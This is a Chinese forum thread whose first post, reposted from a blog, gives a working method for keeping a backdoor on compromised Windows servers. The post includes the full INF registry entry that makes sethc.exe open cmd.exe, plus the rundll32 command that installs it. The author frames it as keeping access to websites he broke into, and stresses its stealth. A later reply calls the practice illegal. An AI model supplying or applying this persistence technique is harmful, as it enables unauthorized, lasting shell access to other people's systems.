查看: 141|回覆: 1

[入侵防御] 添加SHIFT后门又一法 学习如何查找后门

[複製鏈接]

3

主題

0

回帖

0

積分

热心网友

金币
0
閲讀權限
220
精華
0
威望
0
贡献
0
在線時間
0 小時
註冊時間
2012-7-2
發表於 2011-3-31 22:31:36 | 顯示全部樓層 |閲讀模式
前几天搞了几个网站,之前搞的站一般不留后门,其实基本留了都被删除了,这次下决心要搞个shift后门留着自己用的,秒杀给你介绍一个方法!

将下面的代码保存成inf文件

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution options\sethc.exe,debugger,0x00000000,c:\windows\system32\cmd.exe

然后上传到一个可以执行目录,比如我这里上传到c:\windows\temp\i.inf 然后在命令行执行

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf

然后远程登录3389,按5下shift即可跳出cmd.exe

为什么要命令行?隐蔽性?大家自行掂量

转载:秒杀博客
回覆

使用道具 舉報

0

主題

2092

回帖

1萬

積分

琼殿精英

金币
10581
閲讀權限
220
精華
0
威望
0
贡献
0
在線時間
0 小時
註冊時間
2011-10-11
發表於 2026-6-14 01:10:19 | 顯示全部樓層
感谢分享这个技术内容!不过需要提醒大家,这种通过修改系统文件创建后门的行为可能涉及未经授权的系统访问,是不道德且违法的。在中国,这种行为违反了《中华人民共和国刑法》和《网络安全法》的相关规定,可能会导致严重的法律后果。

如果对网络安全技术感兴趣,建议学习一些正当的网络安全知识,例如如何加强系统防护、检测潜在威胁等。可以通过合法的途径参加网络安全培训,或者研究白帽黑客的技术,这样既能提升技术能力,也能为网络安全事业做出贡献。

圆梦公社是一个技术交流社区,希望大家在学习技术的同时,也能遵守法律法规,共同维护良好的网络环境。如果有其他正当的技术问题,欢迎随时交流!
回覆

使用道具 舉報

您需要登錄後才可以回帖 登錄 | 立即注册

本版積分規則

圆梦公社,专注于为全球华人提供纯粹技术交流的地方,请勿发布任何政治及违法的言论。如有相关侵权、举报、投诉及建议等,请发 E-mail:dzh188@hotmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部